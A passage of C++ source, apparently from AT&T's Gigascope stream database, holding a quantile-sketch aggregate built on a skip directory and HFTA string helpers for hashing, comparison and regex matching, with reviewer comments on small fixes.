gs_uint32_t leafptr, T val)
{
gs_uint32_t newptr, oldptr;
gs_int32_t l;
// if path already existed then point to new duplicate
if ((ptrstack[1] == 0) && (sd->headptr[0] != 0)
&& (sd->list[sd->headptr[0]].val == val)) {
sd->list[sd->headptr[0]].down = leafptr;
return;
}
if ((ptrstack[1] != 0) && (sd->list[ptrstack[1]].next != 0)
&& (sd->list[sd->list[ptrstack[1]].next].val == val)) {
sd->list[sd->list[ptrstack[1]].next].down = leafptr;
return;
}
for (l=0; l < SKIPDIR_HEIGHT_MAX; l++) {
if (random() % 2) break;
newptr = skipdir_alloc<T>(sd);
if (!newptr) break; // out of memory
sd->list[newptr].val = val;
//copy(&val, &list[newptr[l]].val);
// link new directory node to level below
if (l > 0)
sd->list[newptr].down = oldptr;
else
sd->list[newptr].down = leafptr;
// insert node into current level
if ((l >= sd->height) || (ptrstack[l+1] == 0)) {
sd->list[newptr].next = sd->headptr[l];
sd->headptr[l] = newptr;
}
else {
sd->list[newptr].next = sd->list[ptrstack[l+1]].next;
sd->list[ptrstack[l+1]].next = newptr;
}
oldptr = newptr;
}
if (l > sd->height) sd->height = l;
//fprintf(stderr,"new height = %u\n",sd->height);
}
template <class T> void skipdir_delete(skipdir_t<T> *sd, gs_uint32_t *ptrstack, T val)
{
gs_uint32_t delptr;
gs_int32_t l;
for (l=0; l < sd->height; l++) {
if (ptrstack[l+1] == 0) {
delptr = sd->headptr[l];
if (delptr == 0) break;
if (sd->list[delptr].val == val) {
sd->headptr[l] = sd->list[delptr].next;
skipdir_free<T>(sd, delptr);
}
else
break;
}
else {
delptr = sd->list[ptrstack[l+1]].next;
if (delptr == 0) break;
if (sd->list[delptr].val == val) {
sd->list[ptrstack[l+1]].next = sd->list[delptr].next;
skipdir_free<T>(sd, delptr);
}
else
break;
}
}
}
// For Debugging
template <class T> void skipdir_print(skipdir_t<T> *sd)
{
gs_uint32_t ptr;
gs_int32_t l;
for (l=sd->height-1; l >= 0; l--) {
for (ptr=sd->headptr[l]; ptr != 0; ptr=sd->list[ptr].next)
fprintf(stderr,"%u ", sd->list[ptr].val);
fprintf(stderr,"\n");
}
fprintf(stderr,"-------\n");
for (l=sd->height-1; l > 0; l--) {
for (ptr=sd->headptr[l]; ptr != 0; ptr=sd->list[ptr].next)
fprintf(stderr,"%u ", sd->list[sd->list[ptr].down].val);
fprintf(stderr,"\n");
}
fprintf(stderr,"-------\n");
}
/*************************** Version 3 **************************/
/* Version 3: LFTA-medium */
/* */
/* NIC performs O(log n) operations at each update. */
/****************************************************************/
/****************************************************************/
/* Helper functions */
/****************************************************************/
template <class T> gs_uint32_t quant_udaf_lfta3_cursor_alloc(quant_udaf_lfta3_struct_t<T> *s)
{
gs_uint32_t ptr = s->freeptr;
if (s->freeptr != 0) s->freeptr = s->t[ptr].next;
s->size++;
// printf("quant_udaf_lfta3_cursor_alloc %d freeptr %d\n",ptr, s->freeptr);
return ptr;
}
template <class T> void quant_udaf_lfta3_cursor_free(quant_udaf_lfta3_struct_t<T> *s, gs_uint32_t ptr)
{
s->t[ptr].next = s->freeptr;
s->freeptr = ptr;
s->size--;
//printf("quant_udaf_lfta3_cursor_free %d\n",ptr);
}
template <class T> void quant_lfta3_print(quant_udaf_lfta3_struct_t<T> *s)
{
tuple_t<T> *t=s->t;
gs_uint32_t ptr = s->usedptr;
if (ptr == 0) {
fprintf(stderr,"<empty>\n");
return;
}
//skipdir_print(&s->sd);
for (; ptr != 0; ptr=t[ptr].next) {
fprintf(stderr,"(%u, %u, %u) ",t[ptr].val,t[ptr].gap,t[ptr].del);
}
fprintf(stderr,"\n");
}
template <class T> void quant_lfta3_compress(quant_udaf_lfta3_struct_t<T> *s)
{
tuple_t<T> *t = s->t;
gs_uint32_t delptr;
gs_uint32_t threshold;
gs_uint32_t ptrstack[SKIPDIR_HEIGHT_MAX+5];
threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (gs_float_t)s->nelts);
//if(s->circptr < 0 || s->circptr >= QUANT_LFTA3_SIZE)
// printf("1) s->circptr = %d\n",s->circptr);
//if(t[s->circptr].next < 0 || t[s->circptr].next >= QUANT_LFTA3_SIZE)
// printf("t[s->circptr].next = %d\n",t[s->circptr].next);
if ((s->circptr == 0) || (t[s->circptr].next == 0)
|| (t[t[s->circptr].next].next == 0))
s->circptr = s->usedptr;
//if ((s->size % 10) != 0) return;
if (s->nelts > 2) {
//if(s->circptr < 0 || s->circptr >= QUANT_LFTA3_SIZE)
// printf("2) s->circptr = %d\n",s->circptr);
delptr = t[s->circptr].next;
//if(delptr < 0 || delptr >= QUANT_LFTA3_SIZE)
// printf("delptr = %d\n",delptr);
//if(t[delptr].next < 0 || t[delptr].next >= QUANT_LFTA3_SIZE)
// printf("t[delptr].next = %d\n",t[delptr].next);
if (t[delptr].gap+t[t[delptr].next].gap+t[t[delptr].next].del < threshold) {
// delete from directory
if (t[s->circptr].val != t[delptr].val) {
// leftmost duplicate (if multiplicity)
skipdir_search<T>(&(s->sd), t[delptr].val, ptrstack);
if (t[delptr].val == t[t[delptr].next].val) {
//if(s->sd.headptr[0] < 0 || s->sd.headptr[0] >= QUANT_LFTA3_SIZE)
// printf("s->sd.headptr[0] = %d\n",s->sd.headptr[0]);
// duplicates case
if ((ptrstack[1] == 0)
&& (s->sd.headptr[0] != 0)
&& (s->sd.list[s->sd.headptr[0]].val == t[delptr].val))
s->sd.list[s->sd.headptr[0]].down = t[delptr].next;
else if ((ptrstack[1] != 0)
&& (s->sd.list[ptrstack[1]].next != 0)
&& (s->sd.list[s->sd.list[ptrstack[1]].next].val == t[delptr].val))
s->sd.list[s->sd.list[ptrstack[1]].next].down = t[delptr].next;
}
else {
// non-duplicates case
skipdir_delete<T>(&(s->sd), ptrstack, t[delptr].val);
}
}
// delete from list
//fprintf(stderr,"DELETED %u\n", t[delptr].val);
t[s->circptr].next = t[delptr].next;
quant_udaf_lfta3_cursor_free<T>(s, delptr);
}
else {
s->circptr = t[s->circptr].next;
}
}
}
/****************************************************************/
/* LFTA3 functions */
/****************************************************************/
// Reset an LFTA quantile sketch to the empty state.
// The byte buffer b holds a quant_udaf_lfta3_struct_t<T>: all counters are
// cleared, every tuple slot is threaded onto the free-list stack (index 0
// acts as the NULL pointer throughout), and the skip directory is rebuilt.
template <class T> void quant_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b) {
	quant_udaf_lfta3_struct_t<T> *sketch = (quant_udaf_lfta3_struct_t<T> *)b;
	sketch->nelts = 0;
	sketch->usedptr = 0;	// 0 == NULL: no tuples in use yet
	sketch->circptr = 0;
	sketch->size = 0;
	// Chain slots 1..QUANT_LFTA3_SIZE into the free-slot stack.
	sketch->freeptr = 1;
	gs_uint32_t slot;
	for (slot = 1; slot < QUANT_LFTA3_SIZE; slot++)
		sketch->t[slot].next = slot + 1;
	sketch->t[QUANT_LFTA3_SIZE].next = 0;	// terminate the free list
	skipdir_create<T>(&(sketch->sd));
}
// Insert one sample v into the LFTA quantile sketch stored in buffer b.
// The sketch is a Greenwald/Khanna-style summary: a value-sorted singly
// linked list of (val, gap, del) tuples held in the fixed slot array s->t
// (slot index 0 doubles as the NULL pointer) and indexed by a skip
// directory for fast positioning. Not reentrant: mutates shared state.
template <class T> void quant_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, T v)
{
	quant_udaf_lfta3_struct_t<T> *s = (quant_udaf_lfta3_struct_t<T> *)b;
	tuple_t<T> *t = s->t;
	gs_uint32_t ptr = s->usedptr;
	gs_uint32_t newptr, delptr;
	gs_uint32_t obj; // objective function: weight of the candidate merge bucket
	gs_uint32_t threshold;
	gs_uint32_t ptrstack[SKIPDIR_HEIGHT_MAX+5]; // skip-directory search path
	gs_uint32_t debugptr;
	//printf("AGGR_UPDATE start\n");
	s->nelts++;
	//fprintf(stderr,"nelts = %u\n",s->nelts);
	// Left boundary: list empty, or v sorts before the current minimum.
	if ((ptr == 0) || (v < t[ptr].val)) {
		// NOTE(review): when ptr == 0 this reads slot 0's stale val field; a
		// chance match increments the unused NULL slot's gap — confirm intended.
		if (t[ptr].val == v) {
			t[ptr].gap++;
			//printf("AGGR_UPDATE END 1\n");
			return;
		}
		//printf("allocating (1) for %u ",v);
		newptr = quant_udaf_lfta3_cursor_alloc<T>(s);
		if (newptr == 0) {
			// Out of slots: the sample is dropped (nelts was still counted).
			gslog(LOG_ALERT, "Out of space in quant_udaf_lfta3_LFTA_AGGR_UPDATE_ (1).\n");
			return;
		}
		// New minimum becomes the list head; its rank is exact, so del = 0.
		t[newptr].val = v;
		t[newptr].gap = 1;
		t[newptr].del = 0;
		t[newptr].next = s->usedptr;
		s->usedptr = newptr;
		//printf("AGGR_UPDATE END 2\n");
		return;
	}
	// Locate i such that v_{i-1} < v <= v_i: coarse position via the skip
	// directory, then a linear walk along the base list.
	skipdir_search<T>(&(s->sd), v, ptrstack);
	//ptr = (ptrstack[0] == 0) ? s->usedptr : s->sd.list[ptrstack[0]].down;
	ptr = (ptrstack[0] == 0) ? s->usedptr : ptrstack[0];
	while ((t[ptr].next != 0) && (t[t[ptr].next].val < v))
		ptr = t[ptr].next;
	/*
	// duplicate value
	if ((t[ptr].next != 0) && (t[t[ptr].next].val == v)) {
		t[t[ptr].next].gap++;
		printf("AGGR_UPDATE END 3\n");
		return;
	}
	*/
	// Right boundary: v is a new maximum, append at the tail.
	if (t[ptr].next == 0) {
		//printf("allocating (2) for %u ",v);
		newptr = quant_udaf_lfta3_cursor_alloc<T>(s);
		if (newptr == 0) {
			gslog(LOG_ALERT, "Out of space in quant_udaf_lfta3_LFTA_AGGR_UPDATE_ (2).\n");
			return;
		}
		// New maximum: rank exact, so del = 0.
		t[newptr].val = v;
		t[newptr].gap = 1;
		t[newptr].del = 0;
		t[newptr].next = 0;
		t[ptr].next = newptr;
		//printf("AGGR_UPDATE END 4\n");
		return;
	}
	// Interior insert: merging v into the successor bucket would give it
	// weight obj; split off a new tuple only when that would break the
	// 2*eps*n error budget.
	//printf("1) t[ptr].next =%d, ptr=%d\n",t[ptr].next,ptr);
	obj = t[ptr].gap+t[t[ptr].next].gap+t[t[ptr].next].del;
	threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (gs_float_t)s->nelts);
	if (obj > threshold) {
		//printf("allocating (3) for %u ",v);
		newptr = quant_udaf_lfta3_cursor_alloc<T>(s);
		if (newptr == 0) {
			gslog(LOG_ALERT, "Out of space in quant_udaf_lfta3_LFTA_AGGR_UPDATE_ (3).\n");
			return;
		}
		//printf("newptr=%d\n",newptr);
		// The new tuple inherits the successor's rank uncertainty.
		t[newptr].val = v;
		t[newptr].gap = 1;
		t[newptr].del = t[t[ptr].next].gap+t[t[ptr].next].del - 1;
		t[newptr].next = t[ptr].next;
		t[ptr].next = newptr;
		skipdir_insert<T>(&(s->sd), ptrstack, newptr, v);
	}
	else {
		// insert into existing bucket: the successor absorbs the sample
		//printf("t[ptr].next =%d\n",t[ptr].next);
		t[t[ptr].next].gap++;
	}
	// Opportunistically merge adjacent tuples back under the error budget.
	quant_lfta3_compress<T>(s);
	//printf("AGGR_UPDATE END 5\n");
}
// Report whether the sketch must be flushed to the HFTA: returns 1 when
// the free-slot stack is exhausted (freeptr == 0), 0 otherwise.
template <class T> gs_int32_t quant_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b) {
	quant_udaf_lfta3_struct_t<T> *sketch = (quant_udaf_lfta3_struct_t<T> *)b;
	return (sketch->freeptr == 0) ? 1 : 0;
}
// Serialize the sketch for transfer to the HFTA. With COMPRESSED_XFER the
// in-use tuples are compacted into slots 1..i (free slots are dropped from
// the wire image) and the reported length covers only the 5-word header
// plus slots 0..i; otherwise the whole struct is shipped. Either way the
// output aliases the aggregate buffer b — no copy is made.
template <class T> void quant_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b)
{
#ifdef COMPRESSED_XFER
	quant_udaf_lfta3_struct_t<T> *s = (quant_udaf_lfta3_struct_t<T> *)b;
	tuple_t<T> tmp[QUANT_LFTA3_SIZE+1];
	gs_uint32_t ptr=s->usedptr;
	gs_int32_t i=0,j;
	// Gather the live tuples, in list order, into tmp[0..i-1].
	for (; ptr != 0; ptr=s->t[ptr].next) {
		tmp[i].val = s->t[ptr].val;
		tmp[i].gap = s->t[ptr].gap;
		tmp[i].del = s->t[ptr].del;
		i++;
	}
	// Rewrite them densely into slots 1..i with consecutive next links.
	for (j=1; j <= i; j++) {
		s->t[j].val = tmp[j-1].val;
		s->t[j].gap = tmp[j-1].gap;
		s->t[j].del = tmp[j-1].del;
		s->t[j].next = j+1;
	}
	s->t[i].next = 0;
	// NOTE(review): if the sketch is empty (i == 0) this marks slot 1 as the
	// list head anyway — presumably OUTPUT is never called on an empty sketch.
	s->usedptr = 1;
	// r->length = (5 + 4*(i+1))*sizeof(gs_uint32_t);
	// Header (nelts, freeptr, usedptr, circptr, size) + slots 0..i.
	r->length = 5*sizeof(gs_uint32_t) + (i+1)*sizeof(tuple_t<T>);
#endif
#ifndef COMPRESSED_XFER
	r->length = sizeof(quant_udaf_lfta3_struct_t<T>);
#endif
	//printf("OUTPUT, size is %d\n",r->length);
	r->data = b;	// shallow: output aliases the aggregate's own buffer
}
// Nothing to release: the whole sketch lives inside the aggregate
// buffer b, so teardown is a no-op.
template <class T> void quant_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b)
{
}
// -----------------------------------------------------------------
// Explicit per-type entry points for the LFTA quantile UDAF.
// Each wrapper simply forwards to the shared template implementation.

// unsigned int
void quant_ui_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_uint32_t>(b); }
void quant_ui_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v){ quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_uint32_t>(b, v); }
gs_int32_t quant_ui_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){ return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_uint32_t>(b); }
void quant_ui_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_uint32_t>(r, b); }
void quant_ui_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_uint32_t>(b); }

// int
void quant_i_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_int32_t>(b); }
void quant_i_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_int32_t v){ quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_int32_t>(b, v); }
gs_int32_t quant_i_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){ return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_int32_t>(b); }
void quant_i_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_int32_t>(r, b); }
void quant_i_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_int32_t>(b); }

// unsigned long
void quant_ul_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_uint64_t>(b); }
void quant_ul_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint64_t v){ quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_uint64_t>(b, v); }
gs_int32_t quant_ul_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){ return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_uint64_t>(b); }
void quant_ul_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_uint64_t>(r, b); }
void quant_ul_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_uint64_t>(b); }

// long
void quant_l_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_int64_t>(b); }
void quant_l_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_int64_t v){ quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_int64_t>(b, v); }
gs_int32_t quant_l_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){ return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_int64_t>(b); }
void quant_l_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_int64_t>(r, b); }
void quant_l_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_int64_t>(b); }

// float
void quant_f_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_float_t>(b); }
void quant_f_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_float_t v){ quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_float_t>(b, v); }
gs_int32_t quant_f_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){ return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_float_t>(b); }
void quant_f_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_float_t>(r, b); }
void quant_f_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){ quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_float_t>(b); }
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <sys/types.h>
#include <iostream>
extern "C" {
#include "gsconfig.h"
#include "gstypes.h"
#include <regex.h>
#include <rdtsc.h>
#include <stringhash.h>
#include <errno.h>
#include <unistd.h>
}
#include <stdio.h>
#include <string.h>
#include <vstring.h>
#include <host_tuple.h>
#include <fta.h>
#include<map>
// for htonl,ntohl
#include <netinet/in.h>
#define MAX_PATTERN_LEN 1024
// Defined here to avoid link errors: this array is auto-generated for the
// lfta and referenced in the clearinghouse library, which gets linked
// against the hfta. The hfta registers no FTA names, hence the empty list.
extern "C" gs_sp_t fta_names[]={0};
// Only used to construct constant strings: initialize tmp as a
// SHALLOW_COPY vstring whose payload is a strdup'ed copy of the C string.
// Fix: tmp->offset was previously left uninitialized when str is empty;
// it is now always set (0 for an empty string).
gs_retval_t Vstring_Constructor(vstring *tmp, gs_csp_t str) {
	tmp->length = strlen(str);
	tmp->offset = tmp->length ? (gs_p_t)strdup(str) : (gs_p_t)0;
	tmp->reserved = SHALLOW_COPY;
	return 0;
}
// Release str's payload and mark it empty. Only INTERNAL strings own
// their buffer; SHALLOW_COPY payloads are borrowed and must not be freed.
// Assumes str is INTERNAL or SHALLOW_COPY.
void hfta_vstr_destroy(vstring * str) {
	if (str->reserved == INTERNAL && str->length)
		free((gs_sp_t)str->offset);
	str->length = 0;
}
// Make the vstring safe to destroy even if its never initialized
// (e.g. stack-allocated groups containing strings).
void hfta_vstr_init(vstring * str) {
	// Zero length suffices: hfta_vstr_destroy only frees when length != 0.
	str->length = 0;
}
// Return the length (in bytes) of the vstring payload.
gs_retval_t hfta_vstr_length(vstring *str) {
	return str->length;
}
// Pack src's payload into a tuple: copy the bytes to data_offset and
// record the in-tuple offset int_offset in the vstring32 header (PACKED).
// Assumes SRC is either INTERNAL or SHALLOW_COPY.
void hfta_vstr_assign_with_copy_in_tuple(vstring32 * target,
	const vstring * src, gs_sp_t data_offset, gs_retval_t int_offset) {
	if (src->length)
		memcpy(data_offset, (gs_sp_t)src->offset, src->length);
	target->length = src->length;
	target->offset = int_offset;
	target->reserved = PACKED;
}
// Ted wrote the following function.
// Deep-copy src into dst; dst is assumed uninitialized/empty on entry and
// owns the new buffer afterwards (INTERNAL). Empty sources copy only the
// length. Assumes SRC is either INTERNAL or SHALLOW_COPY.
void hfta_vstr_assign_with_copy(vstring *dst, const vstring *src){
	dst->reserved = INTERNAL;
	dst->length = src->length;
	if (dst->length) {
		gs_sp_t buf = (gs_sp_t)malloc(dst->length);
		memcpy(buf, (gs_sp_t)(src->offset), dst->length);
		dst->offset = (gs_p_t)buf;
	}
}
// Ted wrote the following function.
// Replace dst with a deep copy of src: release dst's current payload
// (if INTERNAL), then copy. Assumes SRC is INTERNAL or SHALLOW_COPY.
void hfta_vstr_replace(vstring *dst, const vstring *src){
	hfta_vstr_destroy(dst);
	hfta_vstr_assign_with_copy(dst,src);
}
#define HFTA_VSTR_LHASHFUNC_PRIME 12916008961267169387ull
// 64-bit polynomial hash over the vstring payload.
// The payload is consumed in 4-byte groups; each group is folded into
// sub_hash 4 bits per byte (a short final group is zero-padded by extra
// shifts), and groups combine as hash = sub_hash + hash * PRIME.
// NOTE(review): bytes are added through gs_sp_t, so high-bit bytes may
// sign-extend depending on char signedness; the result is still
// deterministic on a given platform — confirm cross-platform use.
gs_uint64_t hfta_vstr_long_hashfunc(const vstring *s) {
	gs_uint64_t hash_code;
	gs_int32_t n_steps;	// number of 4-byte groups (last may be partial)
	gs_int32_t substr_len;	// bytes actually present in the current group
	gs_int32_t j, k;
	gs_uint64_t sub_hash;
	gs_sp_t sv;	// scan pointer into the payload
	sv=(gs_sp_t)(s->offset);
	hash_code = 0;
	n_steps = s->length / 4;
	if(4*n_steps < s->length) n_steps++;	// round up for a partial tail group
	for (j = 0; j < n_steps; j++) {
		if(4*(j+1) < s->length) substr_len = 4;
		else substr_len = s->length - 4*j;
		sub_hash = 0;
		for(k=0;k<4;k++){
			if(k < substr_len)
				sub_hash = (sub_hash << 4) + *sv;
			else
				sub_hash = (sub_hash << 4);	// zero-pad a short final group
			sv++;	// advanced but never dereferenced past the end
		}
		hash_code = (sub_hash + hash_code * HFTA_VSTR_LHASHFUNC_PRIME);
	}
	return(hash_code);
}
#define HFTA_VSTR_HASHFUNC_PRIME 2995999
// 32-bit polynomial hash over the vstring payload; same group-folding
// scheme as hfta_vstr_long_hashfunc but with a 32-bit accumulator and a
// smaller multiplier prime.
gs_uint32_t hfta_vstr_hashfunc(const vstring *s) {
	gs_uint32_t hash_code;
	gs_int32_t n_steps;	// number of 4-byte groups (last may be partial)
	gs_int32_t substr_len;	// bytes actually present in the current group
	gs_int32_t j;
	gs_uint32_t k, sub_hash;
	gs_sp_t sv;	// scan pointer into the payload
	sv=(gs_sp_t)(s->offset);
	hash_code = 0;
	n_steps = s->length / 4;
	if(4*n_steps < s->length) n_steps++;	// round up for a partial tail group
	for (j = 0; j < n_steps; j++) {
		if(4*(j+1) < s->length) substr_len = 4;
		else substr_len = s->length - 4*j;
		sub_hash = 0;
		for(k=0;k<4;k++){
			if(k < substr_len)
				sub_hash = (sub_hash << 4) + *sv;
			else
				sub_hash = (sub_hash << 4);	// zero-pad a short final group
			sv++;	// advanced but never dereferenced past the end
		}
		hash_code = (sub_hash + hash_code * HFTA_VSTR_HASHFUNC_PRIME);
	}
	return(hash_code);
}
// Three-way comparison: negative if s1 < s2, 0 if equal, positive if
// s1 > s2. Bytes are compared over the common prefix; ties are broken
// by length (shorter sorts first).
gs_retval_t hfta_vstr_compare(const vstring * s1, const vstring * s2) {
	gs_int32_t common = (s1->length < s2->length) ? s1->length : s2->length;
	gs_int32_t rc = memcmp((void *)s1->offset, (void *)s2->offset, common);
	return rc ? rc : (s1->length - s2->length);
}
// Equality test: returns 0 when s1 and s2 have identical length and
// bytes, -1 otherwise (note the inverted, memcmp-like convention).
// Fix: replaced the hand-rolled byte loop with memcmp (the stdlib call
// was already present but commented out), and guard the empty case so
// no pointer is passed to memcmp for zero-length strings.
gs_retval_t hfta_vstr_equal(const vstring * s1, const vstring * s2) {
	if(s1->length != s2->length)
		return -1;
	if(s1->length == 0)
		return 0;	// two empty strings are equal; don't touch offsets
	return memcmp((void *)s1->offset,(void *)s2->offset,s1->length) ? -1 : 0;
}
// Compile pattern into a heap-allocated regex_t and return it as the
// parameter handle (0 on failure).
// Fix: the regex_t was leaked when regcomp failed; also removed an
// unused local. NOTE(review): pattern->offset is used as a C string —
// assumes the vstring payload is NUL-terminated; confirm callers.
gs_param_handle_t register_handle_for_str_regex_match_slot_1(vstring* pattern) {
	regex_t * reg;
	if ((reg=(regex_t *) malloc(sizeof(regex_t)))==0) {
		gslog(LOG_EMERG, "No memory for regular expression %s\n",
			  (gs_sp_t)(pattern->offset));
		return 0;
	}
	if (regcomp(reg,(char*)(pattern->offset), REG_NEWLINE|REG_EXTENDED|REG_NOSUB)!=0) {
		gslog(LOG_EMERG, "Illegal regular expression %s\n",
			  (gs_sp_t)(pattern->offset));
		free(reg);	// fix: don't leak the regex_t on compile failure
		return 0;
	}
	return (gs_param_handle_t) reg;
}
// Match str against the regex compiled by
// register_handle_for_str_regex_match_slot_1; returns 1 on match, 0 on
// no match or empty input. A growing static scratch buffer is used to
// NUL-terminate str for regexec, so this function is NOT reentrant.
gs_uint32_t str_regex_match(vstring* str, gs_param_handle_t pattern_handle) {
	regex_t * reg = (regex_t *) pattern_handle ;
	gs_int32_t res;
	static gs_sp_t d=0;	// scratch buffer, persists across calls
	static gs_uint32_t dlen=0;	// current scratch capacity
	// grow our static buffer to the longest string we ever see
	if ((str->length+1) >= dlen) {
		if (d!=0) free((void*)d);
		dlen=0;
		d=0;
		if ((d=(gs_sp_t)malloc(str->length+1))==0) return 0;	// OOM: report no match
		dlen=str->length+1;
	}
	if (str->length==0) return 0;
	// copy the string and 0 terminate it
	memcpy((void *)d,(void *) str->offset, str->length);
	d[str->length]=0;
	res = REG_NOMATCH;
	res = regexec(reg, d, 0, NULL, 0);
	return (res==REG_NOMATCH)?0:1;
}
// Release a handle created by register_handle_for_str_regex_match_slot_1.
// Fix: the old code called regfree() before its NULL check, so a failed
// registration (handle == 0) caused undefined behavior; now both
// regfree and free run only for a non-NULL handle.
gs_retval_t deregister_handle_for_str_regex_match_slot_1(gs_param_handle_t handle) {
	regex_t * x = (regex_t *) handle;
	if (x!=0) {
		regfree(x);
		free(x);
	}
	return 0;
}
// Compile pattern for str_partial_regex_match; returns the regex handle
// or 0 on failure.
// Fix: the regex_t was leaked when regcomp failed; removed unused local.
gs_param_handle_t register_handle_for_str_partial_regex_match_slot_1(vstring* pattern) {
	regex_t * reg;
	if ((reg=(regex_t *) malloc(sizeof(regex_t)))==0) {
		gslog(LOG_EMERG, "No memory for regular expression %s\n",
			  (gs_sp_t)(pattern->offset));
		return 0;
	}
	if (regcomp(reg,(gs_sp_t)(pattern->offset), REG_NEWLINE|REG_EXTENDED|REG_NOSUB)!=0) {
		gslog(LOG_EMERG, "Illegal regular expression %s\n",
			  (gs_sp_t)(pattern->offset));
		free(reg);	// fix: don't leak the regex_t on compile failure
		return 0;
	}
	return (gs_param_handle_t) reg;
}
// Match the compiled regex against at most the first maxlen bytes of
// str; returns 1 on match, 0 otherwise (or on empty input / OOM).
// Shares the static-buffer, non-reentrant design of str_regex_match.
gs_uint32_t str_partial_regex_match(vstring* str, gs_param_handle_t pattern_handle,
     uint maxlen) {
	regex_t * reg = (regex_t *) pattern_handle ;
	gs_int32_t res;
	gs_int32_t end;	// number of bytes actually matched against
	static gs_sp_t d=0;	// scratch buffer, persists across calls
	static gs_uint32_t dlen=0;	// current scratch capacity
	// grow our static buffer to the longest string we ever see
	if ((str->length+1) >= dlen) {
		if (d!=0) free((void*)d);
		dlen=0;
		d=0;
		if ((d=(gs_sp_t)malloc(str->length+1))==0) return 0;	// OOM: report no match
		dlen=str->length+1;
	}
	if (str->length==0) return 0;
	end=(maxlen>(str->length))?(str->length):maxlen;
	// copy the string and 0 terminate it
	memcpy((void *)d,(void *) str->offset, end);
	d[end]=0;
	res = REG_NOMATCH;
	res = regexec(reg, d,0, NULL, 0);
	return (res==REG_NOMATCH)?0:1;
}
// Release a handle from register_handle_for_str_partial_regex_match_slot_1.
// Fix: regfree() was called before the NULL check — undefined behavior
// when registration had failed (handle == 0).
gs_retval_t deregister_handle_for_str_partial_regex_match_slot_1(
		gs_param_handle_t handle) {
	regex_t * x = (regex_t *) handle;
	if (x!=0) {
		regfree(x);
		free(x);
	}
	return 0;
}
// Compile pattern for str_extract_regex (REG_EXTENDED, submatches kept);
// returns the regex handle or 0 on failure.
// Fix: the regex_t was leaked when regcomp failed.
gs_param_handle_t register_handle_for_str_extract_regex_slot_1(vstring* pattern) {
	regex_t * reg;
	if ((reg=(regex_t *) malloc(sizeof(regex_t)))==0) {
		gslog(LOG_EMERG, "No memory for regular expression %s\n",
			  (gs_sp_t)(pattern->offset));
		return 0;
	}
	if (regcomp(reg,(gs_sp_t)(pattern->offset), REG_EXTENDED)!=0) {
		gslog(LOG_EMERG, "Illegal regular expression %s\n",
			  (gs_sp_t)(pattern->offset));
		free(reg);	// fix: don't leak the regex_t on compile failure
		return 0;
